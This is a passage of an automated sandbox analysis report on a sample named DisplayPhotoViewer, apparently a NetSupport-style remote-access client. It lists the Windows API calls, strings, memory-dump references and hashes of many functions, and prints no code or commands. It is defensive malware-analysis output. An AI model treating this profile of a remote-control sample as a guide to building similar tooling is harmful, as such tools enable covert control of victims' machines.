                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountTick$CriticalSection$EnterLeave
                                                                                                    • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                    • API String ID: 956672424-625438208
                                                                                                    • Opcode ID: e26f774285a4bfa5a56468c6f482af273d324fe941443d30310a8240df9aba89
                                                                                                    • Instruction ID: afa8af104bf30b52f31402b86174fc9a0c93113008257d45ec293f1d4e5a4225
                                                                                                    • Opcode Fuzzy Hash: e26f774285a4bfa5a56468c6f482af273d324fe941443d30310a8240df9aba89
                                                                                                    • Instruction Fuzzy Hash: E931C375E14252AFE712CFA5D889F5EBBE4EB05318F0501A9E825EB391D730EC01CBA0
                                                                                                    APIs
                                                                                                    • _memmove.LIBCMT ref: 110C9A48
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                    • String ID: ..\CTL32\NSMString.cpp$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$iAt+nUnits<=Length()$iAt>=0 && iAt<Length()$nUnits>=0
                                                                                                    • API String ID: 1528188558-1174737702
                                                                                                    • Opcode ID: 8c0902955d520c8cf1bbe960f8517294601259b3818032bffdfadcfc7d6abcad
                                                                                                    • Instruction ID: f42b3eb6903577d64847f36363cae9fc279dbf186a4d140b8ba71a5404cd53f2
                                                                                                    • Opcode Fuzzy Hash: 8c0902955d520c8cf1bbe960f8517294601259b3818032bffdfadcfc7d6abcad
                                                                                                    • Instruction Fuzzy Hash: F721F73CB00A177BDB10DE69EC91FDEB3919FE4A08F418068E95927341FA22B9044AD5
                                                                                                    APIs
                                                                                                    • SetDlgItemTextA.USER32(?,?,11189200), ref: 11021266
                                                                                                    • GetDlgItem.USER32(?,?), ref: 1102127A
                                                                                                    • SetFocus.USER32(00000000), ref: 1102127D
                                                                                                    • GetDlgItem.USER32(?,?), ref: 110212A8
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 110212AD
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 11021296
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\nsmdlg.h, xrefs: 11021291
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Item$EnableFocusTextWindow
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\nsmdlg.h$m_hWnd
                                                                                                    • API String ID: 467963834-3304639117
                                                                                                    • Opcode ID: 86a93ed789c0327e3d92eda4b861f5be3429d2ec34d18eb0fd2e3decca17516d
                                                                                                    • Instruction ID: 3cf81791dc8affa6a22c240d28b513f8263695040da33d3af3a9d10dad5f9260
                                                                                                    • Opcode Fuzzy Hash: 86a93ed789c0327e3d92eda4b861f5be3429d2ec34d18eb0fd2e3decca17516d
                                                                                                    • Instruction Fuzzy Hash: 202157B6A00614AFE710DB59DC84FABF7EAFB49714F408929F91697780C774A900CBA0
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,1102CD68,?), ref: 1113D65D
                                                                                                    • wsprintfA.USER32 ref: 1113D67B
                                                                                                    • OutputDebugStringA.KERNEL32(?,?,1102CD68,?), ref: 1113D691
                                                                                                      • Part of subcall function 1113A150: GetTickCount.KERNEL32 ref: 1113A1B8
                                                                                                      • Part of subcall function 1113D2F0: GetCurrentThreadId.KERNEL32 ref: 1113D303
                                                                                                      • Part of subcall function 1113D2F0: wsprintfA.USER32 ref: 1113D383
                                                                                                      • Part of subcall function 1113D2F0: IsBadReadPtr.KERNEL32(?,00000001), ref: 1113D3A8
                                                                                                      • Part of subcall function 1113D2F0: wsprintfA.USER32 ref: 1113D3C8
                                                                                                      • Part of subcall function 1113D2F0: wsprintfA.USER32 ref: 1113D3E5
                                                                                                    • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,1102CD68,?), ref: 1113D6D6
                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,1102CD68,?), ref: 1113D6D9
                                                                                                      • Part of subcall function 110B2610: GetLastError.KERNEL32(1110784B,11189A50,?,?,11028061,?,11189A50,1110784B,00000000), ref: 110B263C
                                                                                                      • Part of subcall function 110B2610: _strrchr.LIBCMT ref: 110B264B
                                                                                                      • Part of subcall function 110B2610: _strrchr.LIBCMT ref: 110B266D
                                                                                                      • Part of subcall function 110B2610: GetTickCount.KERNEL32 ref: 110B269D
                                                                                                      • Part of subcall function 110B2610: GetTickCount.KERNEL32 ref: 110B26C8
                                                                                                      • Part of subcall function 110B2610: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110B26EC
                                                                                                      • Part of subcall function 110B2610: TranslateMessage.USER32(?), ref: 110B26F5
                                                                                                      • Part of subcall function 110B2610: DispatchMessageA.USER32(?), ref: 110B26FE
                                                                                                    • GetKeyState.USER32(00000011), ref: 1113D6F9
                                                                                                    Strings
                                                                                                    • Exception caught at %x. Trying minidump., xrefs: 1113D675
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$CountErrorLastMessageTick$DebugOutputString_strrchr$CurrentDispatchReadStateThreadTranslate
                                                                                                    • String ID: Exception caught at %x. Trying minidump.
                                                                                                    • API String ID: 490122820-543155386
                                                                                                    • Opcode ID: 1882ac8880a0e9807ad161a58648f16f4a893b8a3610cf607d3973b7ca3830fb
                                                                                                    • Instruction ID: 0f8bdfc1f4b97e07f61b132875ea6d081ea0208f0ba83897f92bacd8fe6032dd
                                                                                                    • Opcode Fuzzy Hash: 1882ac8880a0e9807ad161a58648f16f4a893b8a3610cf607d3973b7ca3830fb
                                                                                                    • Instruction Fuzzy Hash: 9F21F579D002189FDB15DB64DDC5FDDB3B8EB5C309F4044A4EA1997284EBB0AA84CBA1
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD71F
                                                                                                    • EnterCriticalSection.KERNEL32(111E41A4), ref: 110FD728
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD72E
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD7AF
                                                                                                    • LeaveCriticalSection.KERNEL32(111E41A4), ref: 110FD7B8
                                                                                                    Strings
                                                                                                    • Warning. simap lock held for %d ms, xrefs: 110FD7CB
                                                                                                    • Warning. took %d ms to get simap lock, xrefs: 110FD73A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountTick$CriticalSection$EnterLeave
                                                                                                    • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                    • API String ID: 956672424-625438208
                                                                                                    • Opcode ID: f482a6b72132e1b5a2ed344e50b762a101e80b5cc96b873eaba95eb37c39ef62
                                                                                                    • Instruction ID: cb6112516052c2a5b18be13c81cc04c2416d8f5290511f5e631eb46653ffda6e
                                                                                                    • Opcode Fuzzy Hash: f482a6b72132e1b5a2ed344e50b762a101e80b5cc96b873eaba95eb37c39ef62
                                                                                                    • Instruction Fuzzy Hash: E7217C68E002D25FE706DFA5D889F6DBAE2AB81319F1540A9D0218F665E625D880C750
                                                                                                    APIs
                                                                                                    • FindWindowA.USER32(00000000,00000000), ref: 11087854
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 11087873
                                                                                                    • OpenProcess.KERNEL32(00000440,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,110FFC55,?,00000001,00000000,00000000), ref: 11087889
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProcessWindow$FindOpenThread
                                                                                                    • String ID: Error. NULL hToken$Progman
                                                                                                    • API String ID: 3432422346-976623215
                                                                                                    • Opcode ID: 31a999eaa275b481e36162bc96484caf47695d0b5085a7a89d93a6f7d445774d
                                                                                                    • Instruction ID: 577cb43ffac78de60545b3a1b6dce0e5cc064d5140e97e09a6559e89939d64d1
                                                                                                    • Opcode Fuzzy Hash: 31a999eaa275b481e36162bc96484caf47695d0b5085a7a89d93a6f7d445774d
                                                                                                    • Instruction Fuzzy Hash: 50118671E115289BCB51DFA4D885BEEF7F8EF4C718F104169ED15A7244EB30A900C7A5
                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 110B3386
                                                                                                    • GetFileVersionInfoSizeA.VERSION(?,?), ref: 110B339C
                                                                                                    • _malloc.LIBCMT ref: 110B33A7
                                                                                                      • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
                                                                                                      • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
                                                                                                      • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
                                                                                                    • GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?), ref: 110B33C1
                                                                                                    • VerQueryValueA.VERSION(00000000,1118E364,?,?,?,?,00000000,00000000,?), ref: 110B33DA
                                                                                                    • _free.LIBCMT ref: 110B33EA
                                                                                                      • Part of subcall function 11158445: HeapFree.KERNEL32(00000000,00000000,?,11160F66,00000000,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 1115845B
                                                                                                      • Part of subcall function 11158445: GetLastError.KERNEL32(00000000,?,11160F66,00000000,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 1115846D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileHeapInfoVersion$AllocateErrorFreeLastQuerySizeValue_free_malloc_memset
                                                                                                    • String ID: shdocvw.dll
                                                                                                    • API String ID: 2585106851-1755026807
                                                                                                    • Opcode ID: 4519c9cbc35da6a2524259d6dbf986fedabafc75943b821104ed265bf93a3951
                                                                                                    • Instruction ID: 69b19f5c92fab129c46dba1ead543c4f90c76f6ec4451b795a7cee44f019feac
                                                                                                    • Opcode Fuzzy Hash: 4519c9cbc35da6a2524259d6dbf986fedabafc75943b821104ed265bf93a3951
                                                                                                    • Instruction Fuzzy Hash: 2D1166B6D041299BCBA4CB65DC81EDEF778EB45308F0041A9D95957244EA706B84CF91
APIs
• IsWindow.USER32(00000000), ref: 1103D836
• FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D84C
• IsWindow.USER32(00000000), ref: 1103D854
• Sleep.KERNEL32(00000014), ref: 1103D867
• FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D877
• IsWindow.USER32(00000000), ref: 1103D87F
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Window$Find$Sleep
• String ID: PCIVideoSlave32
• API String ID: 2137649973-2496367574
• Opcode ID: 9454313089c810d930400881290c14aa3e1bf766efc57f8decebde6de58778c8
• Instruction ID: 1a8355d6b670377a2bfb881dfdae89cbe9e1308f6cfd124a674b34c064d9d0c2
• Opcode Fuzzy Hash: 9454313089c810d930400881290c14aa3e1bf766efc57f8decebde6de58778c8
• Instruction Fuzzy Hash: 2CF01D72A022296ED712EBE99C84F9AF7D8AB84AA5F814074E918D7548D730E8008775
APIs
• LoadMenuA.USER32(00000000,00002EFF), ref: 1100333E
• GetSubMenu.USER32(00000000,00000000), ref: 1100336A
• GetSubMenu.USER32(00000000,00000000), ref: 1100338C
• DestroyMenu.USER32(00000000), ref: 1100339A
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 468487828-934300333
• Opcode ID: 38e803ffbc9ed5d16397c6f3bf807990cbac9101e75636f18d90fbdb22d2249a
• Instruction ID: f90a26523252d68c6535ff68c229b9c2d9a456ce1f5051f6a0844e9fc6656983
• Opcode Fuzzy Hash: 38e803ffbc9ed5d16397c6f3bf807990cbac9101e75636f18d90fbdb22d2249a
• Instruction Fuzzy Hash: 8EF0E96AF80626B6D21352A96C85F8FF758CBD15A9F418070F904B6280FA50A80002E6
APIs
• LoadMenuA.USER32(00000000,00002EF9), ref: 1100324D
• GetSubMenu.USER32(00000000,00000000), ref: 11003273
• GetMenuItemCount.USER32(00000000), ref: 11003297
• DestroyMenu.USER32(00000000), ref: 110032A9
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 4241058051-934300333
• Opcode ID: 732675da0ea725811b98be71d747fcb95b0e444bca69133be625d6e3c1676045
• Instruction ID: d38dec85234622729874ab4cd2c6c3ea96c2fd682ffa7c7270df6d9eb230201a
• Opcode Fuzzy Hash: 732675da0ea725811b98be71d747fcb95b0e444bca69133be625d6e3c1676045
• Instruction Fuzzy Hash: 9DF0E23AE4492BB3C21366B57C09F8FF7948BD16A9F058071F805B6285FA20A40147E2
APIs
• GetClientRect.USER32(?,00000000), ref: 111115E0
• ClientToScreen.USER32(?,?), ref: 11111621
• GetCursorPos.USER32(?), ref: 11111681
• GetTickCount.KERNEL32 ref: 11111696
• GetTickCount.KERNEL32 ref: 11111717
• WindowFromPoint.USER32(?,?,?,?), ref: 1111177A
• WindowFromPoint.USER32(000000FF,?), ref: 1111178E
• SetCursorPos.USER32(000000FF,?,?,?), ref: 111117A2
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: ClientCountCursorFromPointTickWindow$RectScreen
• String ID:
• API String ID: 4245181967-0
• Opcode ID: 751151877e6243d71f276c6990353a8e2fa76892cbe4ca5bda40f7253cc5a873
• Instruction ID: b1aeac07f537f15df3632607b10d074be41c567298c399fbf07d13beffdd9b8d
• Opcode Fuzzy Hash: 751151877e6243d71f276c6990353a8e2fa76892cbe4ca5bda40f7253cc5a873
• Instruction Fuzzy Hash: 71912475A00A0A8FDB14DFB4D584AAEF7F5FF89314F50492ED86A97344DB31A841CB60
APIs
• GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,10705C78), ref: 10709953
• GetEnvironmentStrings.KERNEL32(?,?,?,?,10705C78), ref: 10709967
• GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,10705C78), ref: 10709993
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,10705C78), ref: 107099CB
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10705C78), ref: 107099ED
• FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10705C78), ref: 10709A06
